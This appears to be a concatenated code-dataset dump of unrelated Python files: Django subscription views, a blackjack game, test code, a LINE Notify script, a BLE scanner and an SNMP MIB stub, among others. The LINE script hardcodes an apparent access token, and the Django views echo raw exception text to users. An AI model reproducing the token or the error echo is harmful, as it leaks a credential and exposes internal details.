js_only = []
for f in js_files:
if f.endswith(".map"):
map_files.append(f)
else:
js_only.append(f)
css_only = []
for f in css_files:
if f.endswith(".map"):
map_files.append(f)
else:
css_only.append(f)
# These files are used by Django 'subscribe.html' page, to renders front-end.
react_files = {
'css': css_only,
'js': js_only,
'map': map_files
}
# Example data that subscriptions front-end could receive from back-end
test_data = {
"post_url": "/subscription/",
"user_info": {"first":"John","last":"Doe","hobbies":"Programming.","send_emails_to":"This place."},
"activities": {"method":["email"],"weekly":["CMIP"],"monthly":["CMIP6"]},
"experiments": {"method":["popup"],"daily":["test", "experiment 2"],"weekly":["test2"]},
}
# To pass data to front-end, use react-props and pass it a dictionary with key-value pairs
react_props = test_data
def lookup_and_render(request):
try:
dbres = esgfDatabaseManager.lookupUserSubscriptions(request.user)
except Exception as e:
# log error
error_cond = str(e)
print(traceback.print_exc())
return render(request, 'cog/subscription/subscribe_done.html', {'email': request.user.email, 'error': "An Error Has Occurred While Processing Your Request. <p> {}".format(error_cond)})
return render(request, 'cog/subscription/subscribe_list.html', {'dbres': dbres})
def delete_subscription(request):
res = request.POST.get('subscription_id', None)
try:
if res == "ALL":
dbres = esgfDatabaseManager.deleteAllUserSubscriptions(
request.user)
else:
dbres = esgfDatabaseManager.deleteUserSubscriptionById(res)
except Exception as e:
# log error
error_cond = str(e)
return render(request, 'cog/subscription/subscribe_done.html', {'error': "An Error Has Occurred While Processing Your Request. <p> {}".format(error_cond)})
return render(request, 'cog/subscription/subs_delete_done.html')
def temp_print(request, var_name, method="POST"):
print(request.POST)
if request.method == "POST":
data = json.loads(request.body)
else:
data = request.GET.copy()
if(data):
try:
print("{} {}: {}".format(method, var_name, data[var_name]))
except KeyError:
print("Key error: {}".format(data))
else:
print("{} {}: None".format(method, var_name))
@login_required
def subscribe(request):
# Contains the data from the front-end POST requests
if request.method == "POST":
# Get data from the POST request received from front-end
data = json.loads(request.body)
# Example obtaining data
if data:
for key in data.keys():
print("{}: {}".format(key, data[key]))
# Example response sent back to front-end
test = {"status": "All good!","data": data}
return HttpResponse(json.dumps(test),content_type='application/json')
if request.method == 'GET':
if request.GET.get('action') == "modify":
return lookup_and_render(request)
else:
return render(request, 'cog/subscription/subscribe.html', {'react_files': react_files, 'react_props': react_props})
elif request.POST.get('action') == "delete":
return delete_subscription(request)
else:
period = request.POST.get("period", -1)
if period == -1:
return render(request, 'cog/subscription/subscribe_done.html', {'email': request.user.email, 'error': "Invalid period"})
subs_count = 0
error_cond = ""
keyarr = []
valarr = []
for i in range(1, 4):
keystr = 'subscription_key{}'.format(i)
keyres = request.POST.get(keystr, '')
valstr = 'subscription_value{}'.format(i)
valres = request.POST.get(valstr, '')
if len(keyres) < 2 or len(valres) < 2:
continue
keyarr.append(keyres)
valarr.append(valres)
subs_count = subs_count + 1
if subs_count > 0:
try:
esgfDatabaseManager.addUserSubscription(
request.user, period, keyarr, valarr)
except Exception as e:
# log error
error_cond = str(e)
return render(request, 'cog/subscription/subscribe_done.html', {'email': request.user.email, 'error': "An Error Has Occurred While Processing Your Request. <p> {}".format(error_cond), })
return render(request, 'cog/subscription/subscribe_done.html', {'email': request.user.email, 'count': subs_count})
else:
return render(request, 'cog/subscription/subscribe.html', {'react_files': react_files, 'react_props': react_props})
|
4,878 | 8b598703df67fb8287fe6cdccda5b73bf2892da8 | # -*- coding: utf-8 -*-
import requests
import os
def line(body):
url = "https://notify-api.line.me/api/notify"
access_token = 'I89UnoDRgRSInUXJOTg5fAniBE08CUuxVqj8ythMLt8'
headers = {'Authorization': 'Bearer ' + access_token}
message = body
payload = {'message': message}
r = requests.post(url, headers=headers, params=payload)
def send_image():
url = "https://notify-api.line.me/api/notify"
access_token = 'I89UnoDRgRSInUXJOTg5fAniBE08CUuxVqj8ythMLt8'
# File Name
FILENAME = os.path.join(os.path.dirname(os.path.abspath(__file__)), "screen.png")
headers = {'Authorization': 'Bearer ' + access_token}
message = 'この画面のエラーで落ちました'
image = FILENAME
payload = {'message': message}
files = {'imageFile': open(image, 'rb')}
r = requests.post(url, headers=headers, params=payload, files=files,) |
4,879 | a7050ebd545c4169b481672aed140af610aea997 | from card import Card;
from deck import Deck;
import people;
import chip;
import sys;
import time;
def display_instructions() :
print('\nInstructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 ');
print('as possible without going over. The numbered cards have the value of their number, face cards have ');
print('a value of 10 each, and the ace can either be counted as 1 or 11 (player\'s choice)\n');
print('Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to ');
print('each player (up to 7 players) and to the dealer. The player\'s cards will be face up while one of the ');
print('dealer\'s cards will be face down. Then, each player will choose to either hit, stand, split, or double down: \n');
print(' Hit: when a player \'hits,\' he or she is dealt another card. A player can hit as many ');
print(' times as wanted, up until the player busts (goes over 21). \n');
print(' Stand: To \'stand\' means to stay with the current cards. \n');
print(' Split: A player can \'split\' only when the first two cards of his or her hand are the ');
print(' same. When this occurs, the player makes two separate piles, one with each ');
print(' identical card, and places a bet identical to the initial bet for the second ');
print(' pile. Then, the player can hit or stand with each pile as in a normal round.\n');
print(' Double Down: When a player chooses to \'double down\', he or she can increase the current bet ');
print(' by 100% in exchange for agreeing to stand after being dealt one more card.\n');
input('Ready to play? Hit any key to continue: ');
print();
def get_num_players() :
num = input('How many people will be playing (up to 7)? Enter a number: ');
while not num.isdigit() or int(num) < 1 or int(num) > 7:
num = input('Please enter a number from 1 to 7: ');
print('\nGreat! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\n');
time.sleep(1);
return int(num);
def create_players(num) :
players_list = [];
for i in range(num) :
name = input(f'Player {i+1}, what is your name? ');
while name == '':
name = input('Please enter your name: ');
players_list.append(people.Player(name, 1000));
print('\nAll players will begin the game with the same amount of $1,000 dollars.\n');
return players_list;
def deal(dealer, players) :
for player in players[:-1] :
if not player.check_broke() : dealer.deal_card(player);
dealer.deal_card(players[-1]); # dealer deals card to dealer, too
def place_bets(players) :
print('Now, each of you must place your bets.\n');
bets = [];
for player in players[:-1] : # doesn't reach dealer
if not player.check_broke() :
bet = input(f'Bet for {player.name}: ');
while not bet.isdigit() or int(bet) > player.money :
msg = 'Please enter a whole number: ';
if bet.isdigit() :
msg = 'You don\'t have enough money! Enter a different value: ';
bet = input(msg);
player.bet = int(bet);
print();
def view_hands(players) :
print('Here are the hands for each player: \n');
for p in players :
if isinstance(p, people.Dealer) :
print(f'{p.name}: [{p.hand[0][0]}, ?]', end='');
print();
else :
if not p.check_broke() :
print(f'{p.name}: {p.hand}', end='');
if p.check_blackjack() :
print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!');
else : print();
print();
def do_decision(player, dealer, hand_index=0) :
choices_dict = {'s':stand, 'h':hit, 'p':split, 'd':double_down};
valid_choice = False;
while not valid_choice :
choice = input(f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): ');
while choice.lower() not in choices_dict.keys() :
choice = input('Please enter either \'s\', \'h\', \'p\', or \'d\', corresponding to your choice: ');
valid_choice = choices_dict.get(choice)(player, dealer, hand_index);
def cycle_decisions(players) :
dealer = players[-1];
for p in players :
if isinstance(p, people.Dealer) :
print(f'{p.name} will hit until reaching a hand of at least \'hard\' 17 (without an ace counting for 11).');
sys.stdout.flush();
time.sleep(0.8);
if not check_status(p) and not p.check_hard_17() : hit(p, dealer);
sys.stdout.flush();
time.sleep(0.5);
disp_str_slow('\nEnd-of-Round Earnings: \n', 0.05);
if p.check_bust() :
for i in players[:-1] :
if not i.check_broke() :
sys.stdout.flush();
time.sleep(0.5);
print(' ', end='');
for j in range(0,len(i.hand)) : # this is to loop through each hand for a player (player would have multiple hands after splitting)
if not i.check_bust(j) :
print(f'{i.name} wins ${i.bet}! ', end='');
i.money += i.bet;
else :
print(f'{i.name} loses ${i.bet}! ', end='');
i.money -= i.bet;
i.chips = chip.convert_to_chips(i.money);
if i.check_broke() :
print(f'Sorry {i.name}, but you\'re out of money and can no longer play in this game');
else :
print(f'Current Balance: ${i.money} (Chips: {i.chips})');
else :
for i in players[:-1] :
if not i.check_broke() :
sys.stdout.flush();
time.sleep(0.5);
print(' ', end='');
for j in range(0,len(i.hand)) :
if not i.check_bust(j) :
if i.hand_value(j) > p.hand_value() :
print(f'{i.name} wins ${i.bet}! ', end='');
i.money += i.bet;
elif i.hand_value(j) < p.hand_value() :
print(f'{i.name} loses ${i.bet}! ', end='');
i.money -= i.bet;
else :
print(f'{i.name} tied with the {p.name}! No change. ', end='');
else :
print(f'{i.name} loses ${i.bet}! ', end='');
i.money -= i.bet;
i.chips = chip.convert_to_chips(i.money);
if i.check_broke() :
print(f'Sorry {i.name}, but you\'re out of money and can no longer play in this game');
else :
print(f'Current Balance: ${i.money} (Chips: {i.chips})');
sys.stdout.flush();
time.sleep(0.5);
else :
if not p.check_blackjack() and not p.check_broke() :
do_decision(p, dealer);
def stand(player, dealer, hand_index=0) :
print(f'{player.name} stands.\n');
return True;
def hit(player, dealer, hand_index=0) :
dealer.deal_card(player, hand_index);
done = check_status(player, hand_index);
if isinstance(player, people.Dealer) :
while not player.check_hard_17() and not done:
time.sleep(0.5);
dealer.deal_card(player, hand_index);
done = check_status(player, hand_index);
else :
choice = '';
if not done :
choice = input('Do you want to hit again (\'y\' or \'n\')? ').lower();
while choice != 'y' and choice != 'n' :
choice = input('Enter either \'y\' or \'n\': ');
while choice == 'y' and not done:
dealer.deal_card(player, hand_index);
done = check_status(player, hand_index);
if not done :
choice = input('Do you want to hit again (\'y\' or \'n\')? ').lower();
while choice != 'y' and choice != 'n' :
choice = input('Enter either \'y\' or \'n\': ');
if not done : print();
return True;
def split(player, dealer, hand_index=0) :
if player.hand[hand_index][0] != player.hand[hand_index][1] :
print('You can\'t split on that hand! You need two identical cards to split. Choose again.');
return False;
elif player.bet*2 > player.money :
print(f'You don\'t have enough money to split with your current bet (${player.bet} * 2 = ${player.bet*2})! Choose again.');
return False;
hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]];
player.hand = hands;
print('Now you will play each hand separately: \n');
for i in range(0,2) :
print(f'For Hand #{i+1}: ');
do_decision(player, dealer, i);
return True;
def double_down(player, dealer, hand_index=0) :
if player.bet*2 > player.money :
print(f'You don\'t have enough money to do that (${player.bet} * 2 = ${player.bet*2})! Choose again.');
return False;
elif player.did_double_down :
print('You can double down only once! Choose a different option.');
return False;
player.bet *= 2;
player.did_double_down = True;
print(f'Bet increased to ${player.bet}!.');
do_decision(player, dealer, hand_index);
return True;
def check_status(player, hand_index=0) :
done = False;
hand_string = '[';
for card in player.hand[hand_index][:-1] :
hand_string += card.__str__() + ', ';
print(f'Current Hand: {hand_string}', end='');
sys.stdout.flush();
time.sleep(0.5);
disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05);
time.sleep(0.5);
if player.check_blackjack(hand_index) :
disp_str_slow(' ==> BLACKJACK!!! ', 0.05);
if not isinstance(player, people.Dealer) :
disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05);
print('\n\n', end='');
done = True;
sys.stdout.flush();
time.sleep(0.5);
elif player.check_bust(hand_index) :
disp_str_slow(' ==> BUST! ', 0.05);
if not isinstance(player, people.Dealer) :
disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05);
print('\n\n', end='');
done = True;
sys.stdout.flush();
time.sleep(0.5);
else :
print();
return done;
def play_again(players) :
print();
all_broke = True;
for i in players :
if not i.check_broke() : all_broke = False;
if not all_broke :
choice = input('Do you all want to play another round? Enter \'y\' or \'n\': ').lower();
while choice != 'y' and choice != 'n' :
choice = input('Enter either \'y\' or \'n\': ');
print();
return choice;
else :
print();
return 'n';
def reset(players) :
dealer = players[-1];
for player in players :
dealer.retrieve_cards(player);
player.bet = 0;
def display_accounts(players) :
for player in players[:-1] :
change = player.money - player.initial_money;
word = 'gain';
if change < 0 :
word = 'loss';
print(f' {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\n');
sys.stdout.flush();
time.sleep(0.5);
def disp_str_slow(phrase, t) :
for i in phrase :
print(i, end='');
sys.stdout.flush();
time.sleep(t);
def print_players(players) :
for player in players :
print(player);
def main() :
display_instructions();
num_players = get_num_players();
players = create_players(num_players);
dealer = people.Dealer(Deck(6));
players.append(dealer);
replay_choice = 'y';
while replay_choice == 'y' :
reset(players);
place_bets(players);
for i in range(0,2) :
deal(dealer, players);
view_hands(players);
cycle_decisions(players);
replay_choice = play_again(players);
print('------------------------------------------------------------------------------------------------\n');
disp_str_slow('FINAL PLAYER ACCOUNTS\n\n', 0.05);
sys.stdout.flush();
time.sleep(0.5)
display_accounts(players);
sys.stdout.flush();
time.sleep(0.2)
print('------------------------------------------------------------------------------------------------\n');
print('Goodbye!');
if __name__ == '__main__' :
main(); |
4,880 | 82c3419679a93c7640eae48b543aca75f5ff086d | from msl.equipment.connection import Connection
from msl.equipment.connection_demo import ConnectionDemo
from msl.equipment.record_types import EquipmentRecord
from msl.equipment.resources.picotech.picoscope.picoscope import PicoScope
from msl.equipment.resources.picotech.picoscope.channel import PicoScopeChannel
class MyConnection(Connection):
def __init__(self, record):
super(MyConnection, self).__init__(record)
def get_none1(self):
"""No return type is specified."""
pass
def get_none2(self, channel):
"""This function takes 1 input but returns nothing.
Parameters
----------
channel : :obj:`str`
Some channel number
"""
pass
def get_bool1(self):
""":obj:`bool`: A boolean value."""
pass
def get_bool2(self):
"""Returns a boolean value.
Returns
-------
:obj:`bool`
A boolean value.
"""
pass
def get_string1(self):
""":obj:`str`: A string value."""
pass
def get_string2(self):
"""Returns a string value.
Returns
-------
:obj:`str`
A string value.
"""
pass
def get_bytes1(self):
""":obj:`bytes`: A bytes value."""
pass
def get_bytes2(self):
"""Returns a bytes value.
Returns
-------
:obj:`bytes`
A bytes value.
"""
pass
def get_int1(self):
""":obj:`int`: An integer value."""
pass
def get_int2(self):
"""Returns an integer value.
Returns
-------
:obj:`int`
An integer value.
"""
pass
def get_float1(self):
""":obj:`float`: A floating-point value."""
pass
def get_float2(self):
"""Returns a floating-point value.
Returns
-------
:obj:`float`
A floating-point value.
"""
pass
def get_list_of_bool1(self):
""":obj:`list` of :obj:`bool`: A list of boolean values."""
pass
def get_list_of_bool2(self):
"""A list of boolean values.
Returns
-------
:obj:`list` of :obj:`bool`
A list of boolean values.
"""
pass
def get_list_of_str1(self):
""":obj:`list` of :obj:`str`: A list of string values."""
pass
def get_list_of_str2(self):
"""A list of string values.
Returns
-------
:obj:`list` of :obj:`str`
A list of string values.
"""
pass
def get_list_of_bytes1(self):
""":obj:`list` of :obj:`bytes`: A list of bytes values."""
pass
def get_list_of_bytes2(self):
"""A list of bytes values.
Returns
-------
:obj:`list` of :obj:`bytes`
A list of bytes values.
"""
pass
def get_list_of_int1(self):
""":obj:`list` of :obj:`int`: A list of integer values."""
pass
def get_list_of_int2(self):
"""A list of integer values.
Returns
-------
:obj:`list` of :obj:`int`
A list of integer values.
"""
pass
def get_list_of_float1(self):
""":obj:`list` of :obj:`float`: A list of floating-point values."""
pass
def get_list_of_float2(self):
"""A list of floating-point values.
Returns
-------
:obj:`list` of :obj:`float`
A list of floating-point values.
"""
pass
def get_dict_of_bool1(self):
""":obj:`dict` of :obj:`bool`: A dictionary of boolean values."""
pass
def get_dict_of_bool2(self):
"""A dictionary of boolean values.
Returns
-------
:obj:`dict` of :obj:`bool`
A dictionary of boolean values.
"""
pass
def get_dict_of_str1(self):
""":obj:`dict` of :obj:`str`: A dictionary of string values."""
pass
def get_dict_of_str2(self):
"""A dictionary of string values.
Returns
-------
:obj:`dict` of :obj:`str`
A dictionary of string values.
"""
pass
def get_dict_of_bytes1(self):
""":obj:`dict` of :obj:`bytes`: A dictionary of bytes values."""
pass
def get_dict_of_bytes2(self):
"""A dictionary of bytes values.
Returns
-------
:obj:`dict` of :obj:`bytes`
A dictionary of bytes values.
"""
pass
def get_dict_of_int1(self):
""":obj:`dict` of :obj:`int`: A dictionary of integer values."""
pass
def get_dict_of_int2(self):
"""A dictionary of integer values.
Returns
-------
:obj:`dict` of :obj:`int`
A dictionary of integer values.
"""
pass
def get_dict_of_float1(self):
""":obj:`dict` of :obj:`float`: A dictionary of floating-point values."""
pass
def get_dict_of_float2(self):
"""A dictionary of floating-point values.
Returns
-------
:obj:`dict` of :obj:`float`
A dictionary of floating-point values.
"""
pass
def get_multiple1(self):
"""Many different data types.
Returns
-------
:obj:`str`
A string value.
:obj:`float`
A floating-point value.
:obj:`float`
A floating-point value.
:obj:`dict` of :obj:`int`
A dictionary of integer values.
:obj:`bytes`
A bytes value.
"""
pass
def test_return_type_builtin():
demo = ConnectionDemo(EquipmentRecord(), MyConnection)
assert demo.get_none1() is None
assert demo.get_none2() is None
assert isinstance(demo.get_bool1(), bool)
assert isinstance(demo.get_bool2(), bool)
assert isinstance(demo.get_string1(), str)
assert isinstance(demo.get_string2(), str)
assert isinstance(demo.get_bytes1(), bytes)
assert isinstance(demo.get_bytes2(), bytes)
assert isinstance(demo.get_int1(), int)
assert isinstance(demo.get_int2(), int)
assert isinstance(demo.get_float1(), float)
assert isinstance(demo.get_float2(), float)
x = demo.get_list_of_bool1()
assert isinstance(x, list) and isinstance(x[0], bool)
x = demo.get_list_of_bool2()
assert isinstance(x, list) and isinstance(x[0], bool)
x = demo.get_list_of_str1()
assert isinstance(x, list) and isinstance(x[0], str)
x = demo.get_list_of_str2()
assert isinstance(x, list) and isinstance(x[0], str)
x = demo.get_list_of_bytes1()
assert isinstance(x, list) and isinstance(x[0], bytes)
x = demo.get_list_of_bytes2()
assert isinstance(x, list) and isinstance(x[0], bytes)
x = demo.get_list_of_int1()
assert isinstance(x, list) and isinstance(x[0], int)
x = demo.get_list_of_int2()
assert isinstance(x, list) and isinstance(x[0], int)
x = demo.get_list_of_float1()
assert isinstance(x, list) and isinstance(x[0], float)
x = demo.get_list_of_float2()
assert isinstance(x, list) and isinstance(x[0], float)
x = demo.get_dict_of_bool1()
assert isinstance(x, dict) and isinstance(x['demo'], bool)
x = demo.get_dict_of_bool2()
assert isinstance(x, dict) and isinstance(x['demo'], bool)
x = demo.get_dict_of_str1()
assert isinstance(x, dict) and isinstance(x['demo'], str)
x = demo.get_dict_of_str2()
assert isinstance(x, dict) and isinstance(x['demo'], str)
x = demo.get_dict_of_bytes1()
assert isinstance(x, dict) and isinstance(x['demo'], bytes)
x = demo.get_dict_of_bytes2()
assert isinstance(x, dict) and isinstance(x['demo'], bytes)
x = demo.get_dict_of_int1()
assert isinstance(x, dict) and isinstance(x['demo'], int)
x = demo.get_dict_of_int2()
assert isinstance(x, dict) and isinstance(x['demo'], int)
x = demo.get_dict_of_float1()
assert isinstance(x, dict) and isinstance(x['demo'], float)
x = demo.get_dict_of_float2()
assert isinstance(x, dict) and isinstance(x['demo'], float)
x = demo.get_multiple1()
assert len(x) == 5
assert isinstance(x[0], str)
assert isinstance(x[1], float)
assert isinstance(x[2], float)
assert isinstance(x[3], dict) and isinstance(x[3]['demo'], int)
assert isinstance(x[4], bytes)
def test_return_type_object():
scope = ConnectionDemo(EquipmentRecord(), PicoScope)
x = scope.channel()
assert isinstance(x, dict) and x['demo'] == PicoScopeChannel
|
4,881 | 7df94c86ff837acf0f2a78fe1f99919c31bdcb9b | from .dla import get_network as get_dla
from lib.utils.tless import tless_config
_network_factory = {
'dla': get_dla
}
def get_network(cfg):
arch = cfg.network
heads = cfg.heads
head_conv = cfg.head_conv
num_layers = int(arch[arch.find('_') + 1:]) if '_' in arch else 0
arch = arch[:arch.find('_')] if '_' in arch else arch
get_model = _network_factory[arch]
network = get_model(num_layers, heads, head_conv, tless_config.down_ratio, cfg.det_dir)
return network
|
4,882 | 834fa5d006188da7e0378246c1a019da6fa413d2 | You are given a 2 x N board, and instructed to completely cover the board with
the following shapes:
Dominoes, or 2 x 1 rectangles.
Trominoes, or L-shapes.
For example, if N = 4, here is one possible configuration, where A is
a domino, and B and C are trominoes.
A B B C
A B C C
Given an integer N, determine in how many ways this task is possible.
|
4,883 | 0349a8a4841b024afd77d20ae18810645fad41cd | from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.utils.html import strip_tags
from datetime import datetime, timedelta
def sendmail(subject, template, to, context):
template_str = 'app/' + template + '.html'
html_msg = render_to_string(template_str, {'data': context})
plain_msg = strip_tags(html_msg)
from_email = 'ridham.shah.aditi@gmail.com'
send_mail(subject, plain_msg, from_email, to, html_message=html_msg) |
4,884 | 8ad5f3e5f73eae191a3fe9bc20f73b4bfcfedc8c | #Pràctica 9 Condicionals, Exercici 2:
print("Introduce un valor par:")
numpar=int(input())
print("Introduce un valor impar:")
numimp=int(input())
if numpar==numimp*2:
print(numpar," es el doble que ",numimp,".")
else:
print(numpar," no es el doble que ",numimp,".") |
4,885 | 8039430f1b65cc76f9a78b1094f110de29f0f965 | from utils import *
from Dataset.input_pipe import *
from Learning.tf_multipath_classifier import *
def config_graph():
paths = []
path = {}
path['input_dim'] = 4116
path['name'] = 'shared1'
path['computation'] = construct_path(path['name'], [512, 512], batch_norm=False, dropout=True, dropout_rate=0.5, noise=False, noise_std=0.16)
path['input'] = 'organic'
paths.append(path)
path = {}
path['name'] = 'aspects'
path['input'] = 'shared1'
path['input_dim'] = 512
path['computation'] = construct_path(path['name'], [11], batch_norm=False, activation=None)
path['optimizer'] = tf.train.AdamOptimizer(name='optimizer', learning_rate=0.0001 , beta1=0.92 , beta2=0.9999)
path['loss'] = loss_map('sigmoid')
path['predictor'] = sigmoid_predictor()
paths.append(path)
return paths
org_dict_full = prep_organic_aspects()
dataset_size = len(org_dict_full['train_data'])
folds = 10
fold_size= ceil(dataset_size / folds)
avg_f1 = 0
for f in range(0,folds):
fold_start = f * fold_size
fold_end = min((f+1) * fold_size, dataset_size )
print(fold_start, fold_end)
org_dict = fold_data_dict(org_dict_full, fold_start, fold_end )
datasets = []
dataset = {}
dataset['name'] = 'organic'
# dataset['holdout'] = 50
dataset['batch_size'] = 10
dataset['features'] = org_dict['train_vecs']
dataset['type'] = tf.float32
dataset['tasks'] = [{'name' : 'aspects', 'features' : org_dict['encoded_train_labels'], 'type': tf.float32}]
datasets.append(dataset)
paths = config_graph()
params = {}
params['train_iter'] = 4001
model = TfMultiPathClassifier(datasets, paths, params)
model.train()
model.save()
y = model.get_prediciton('aspects', org_dict['test_vecs'])
x = model.get_prediciton('aspects', org_dict['train_vecs'])
multi_label_metrics(x, org_dict['train_labels'], org_dict['encoded_train_labels'],
org_dict['labeling'], org_dict['train_data'] )
_, f1 = multi_label_metrics(y, org_dict['test_labels'], org_dict['encoded_test_labels'],
org_dict['labeling'], org_dict['test_data'], mute=True )
avg_f1 +=f1
avg_f1 = avg_f1 / folds
print('\n--------------------------------------------------------------------------\nAverage F1 score:', avg_f1) |
4,886 | 364150d6f37329c43bead0d18da90f0f6ce9cd1b | #coding=utf-8
import yaml
import os
import os.path
import shutil
import json
import subprocess
import sys
sys.path.append(os.path.split(os.path.realpath(__file__))[0])
import rtool.taskplugin.plugin.MultiProcessRunner as MultiProcessRunner
import rtool.utils as utils
logger = utils.getLogger('CopyRes')
def run():
logger.debug("CopyRes")
pass
def run_with_configs(configs,tp=None):
logger.debug("Executing NCopyRes")
apaction = CopyResAction()
apaction.go(configs)
pass
def safeRemoveDir(dir_path):
if os.path.exists(dir_path):
shutil.rmtree(dir_path)
pass
def clean_output(configs):
default_output_path = configs["output-root"]
safeRemoveDir(default_output_path)
pass
class CopyResAction:
"""根据资源配置文件直接复制资源到目标目录"""
default_option = None
res_root = None
packing_root = None
ignore_list=[]
def setResRoot(self,root):
self.res_root = root
pass
def setPackingRoot(self,root):
self.packing_root = root
pass
def setDefaultOption(self,option):
self.default_option = option
pass
def go(self,config):
ext_list = []
input_list = config['input']
if not config['options']['cpall']:
if 'cpextlist' in config['options']:
ext_list = config['options']['cpextlist'].split(',')
for input_file_path in input_list:
basedir,filename = os.path.split(input_file_path)
name,fext = os.path.splitext(filename)
for ext in ext_list:
if ext == fext:
# 保留目录结构的为相对于配置项根目录的层级
input_file_dir = os.path.dirname(input_file_path)
dest_dir = os.path.join(config['outputroot'],os.path.relpath(input_file_dir,config['config-root']))
dest_dir = config['output-root']
# d_dir = config['output']
if 'dst' in config['options']:
d_dir = config['options']['dst']
dest_dir = os.path.join(config['outputroot'],d_dir,os.path.relpath(input_file_dir,config['config-root']))
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
logger.debug("[CopyRes]copy "+input_file_path+" to "+dest_dir)
shutil.copy2(input_file_path,dest_dir)
if 'filenames' in config['options']:
filenames_list = config['options']['filenames'].split(',')
for filename in filenames_list:
for input_file_path in input_list:
dirname,input_file_name = os.path.split(input_file_path)
if filename==input_file_name:
# 保留目录结构的为相对于配置项根目录的层级
input_file_dir = os.path.dirname(input_file_path)
dest_dir = os.path.join(config['outputroot'],os.path.relpath(input_file_dir,config['config-root']))
dest_dir = config['output-root']
# d_dir = config['output']
if 'dst' in config['options']:
d_dir = config['options']['dst']
dest_dir = os.path.join(config['outputroot'],d_dir,os.path.relpath(input_file_dir,config['config-root']))
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
logger.debug("[CopyRes]copy "+input_file_path+" to "+dest_dir)
shutil.copy2(input_file_path,dest_dir)
else:
for input_file_path in input_list:
# 保留目录结构的为相对于配置项根目录的层级
input_file_dir = os.path.dirname(input_file_path)
dest_dir = os.path.join(config['outputroot'],os.path.relpath(input_file_dir,config['config-root']))
dest_dir = config['output-root']
# d_dir = config['output']
if 'dst' in config['options']:
d_dir = config['options']['dst']
dest_dir = os.path.join(config['outputroot'],d_dir,os.path.relpath(input_file_dir,config['config-root']))
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
logger.debug("[CopyRes]copy "+input_file_path+" to "+dest_dir)
shutil.copy2(input_file_path,dest_dir)
pass
pass |
4,887 | ce365e011d8cc88d9aa6b4df18ea3f4e70d48f5c | #https://codecombat.com/play/level/village-champion
# Incoming munchkins! Defend the town!
# Define your own function to fight the enemy!
# In the function, find an enemy, then cleave or attack it.
def attttaaaaacccckkkk():
enemy = hero.findNearest(hero.findEnemies())
#enemy = hero.findNearestEnemy()
if enemy:
if enemy and hero.isReady('cleave'):
hero.cleave(enemy)
else:
hero.attack(enemy)
# Move between patrol points and call the function.
while True:
hero.moveXY(35, 34)
# Use whatever function name you defined above.
attttaaaaacccckkkk()
hero.moveXY(47, 27)
# Call the function again.
attttaaaaacccckkkk()
hero.moveXY(60, 31)
# Call the function again.
attttaaaaacccckkkk()
|
4,888 | 480e636cfe28f2509d8ecf1e6e89924e994f100d | #!/usr/bin/env python3
import gatt
class AnyDevice(gatt.Device):
def connect_succeeded(self):
super().connect_succeeded()
print("[%s] Connected" % (self.mac_address))
def connect_failed(self, error):
super().connect_failed(error)
print("[%s] Connection failed: %s" % (self.mac_address, str(error)))
def disconnect_succeeded(self):
super().disconnect_succeeded()
print("[%s] Disconnected" % (self.mac_address))
def services_resolved(self):
super().services_resolved()
print("[%s] Resolved services" % (self.mac_address))
for service in self.services:
print("[%s] Service [%s]" % (self.mac_address, service.uuid))
for characteristic in service.characteristics:
print("[%s] Characteristic [%s]" % (self.mac_address, characteristic.uuid))
print(dir(characteristic))
print("*****")
class AnyDeviceManager(gatt.DeviceManager):
def __init__(self, adapter_name, mac_list):
super().__init__(adapter_name)
self.mac_list = mac_list
def device_discovered(self, device):
#print("Discovered [%s] %s" % (device.mac_address, device.alias()))
if ('powertap' in device.alias() and 'L' in device.alias()):
print(device.mac_address)
manager.stop()
manager = AnyDeviceManager(adapter_name='hci0',mac_list=[])
manager.start_discovery()
manager.run()
#74:5c:4b:0b:4e:f2
#device = AnyDevice(mac_address='66:12:d1:56:6b:3c', manager=manager)
|
4,889 | 202670314ad28685aaa296dce4b5094daab3f47a | #
# PySNMP MIB module Nortel-MsCarrier-MscPassport-AtmEbrMIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Nortel-MsCarrier-MscPassport-AtmEbrMIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:19:41 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection")
mscAtmIfIndex, mscAtmIfVptIndex, mscAtmIfVcc, mscAtmIfVptVccIndex, mscAtmIfVpc, mscAtmIfVptVcc, mscAtmIfVccIndex, mscAtmIfVpcIndex = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex", "mscAtmIfVptIndex", "mscAtmIfVcc", "mscAtmIfVptVccIndex", "mscAtmIfVpc", "mscAtmIfVptVcc", "mscAtmIfVccIndex", "mscAtmIfVpcIndex")
mscAtmIfIisp, mscAtmIfVptIisp, mscAtmIfVptIispIndex, mscAtmIfIispIndex = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIisp", "mscAtmIfVptIisp", "mscAtmIfVptIispIndex", "mscAtmIfIispIndex")
